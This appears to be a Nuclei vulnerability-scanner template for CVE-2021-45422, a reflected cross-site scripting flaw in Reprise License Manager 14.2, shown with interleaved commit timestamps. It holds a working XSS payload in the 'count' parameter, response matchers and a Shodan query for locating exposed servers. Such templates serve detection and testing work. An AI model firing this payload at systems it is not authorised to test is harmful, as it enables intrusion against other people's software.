2022-07-31 06:21:31 +00:00
|
|
|
id: CVE-2021-45422
|
|
|
|
|
|
|
|
info:
|
2022-08-29 13:55:23 +00:00
|
|
|
name: Reprise License Manager 14.2 - Cross-Site Scripting
|
2022-07-31 06:21:31 +00:00
|
|
|
author: edoardottt
|
|
|
|
severity: medium
|
2022-08-09 16:39:51 +00:00
|
|
|
description: |
|
2022-08-29 13:55:23 +00:00
|
|
|
Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET.
|
2022-07-31 06:21:31 +00:00
|
|
|
reference:
|
|
|
|
- https://seclists.org/fulldisclosure/2022/Jan/31
|
2022-07-31 06:32:29 +00:00
|
|
|
- https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/
|
2022-08-09 16:39:51 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-45422
|
2023-04-12 10:55:48 +00:00
|
|
|
- http://reprise.com
|
2022-07-31 06:21:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2021-45422
|
|
|
|
cwe-id: CWE-79
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.00287
|
|
|
|
cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
|
2022-08-09 16:39:51 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-08-09 16:39:51 +00:00
|
|
|
shodan-query: http.html:"Reprise License"
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: reprisesoftware
|
|
|
|
product: reprise_license_manager
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2021,reprise,xss,seclists
|
2022-07-31 06:21:31 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-31 06:21:31 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-08-09 16:39:51 +00:00
|
|
|
- "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
2022-07-31 06:21:31 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-08-09 16:39:51 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'value=""><script>alert(document.domain)</script>"><input type='
|
2022-08-09 16:45:23 +00:00
|
|
|
- 'value: "><script>alert(document.domain)</script>)<br>'
|
|
|
|
condition: or
|
2022-07-31 06:21:31 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
2022-08-09 16:39:51 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|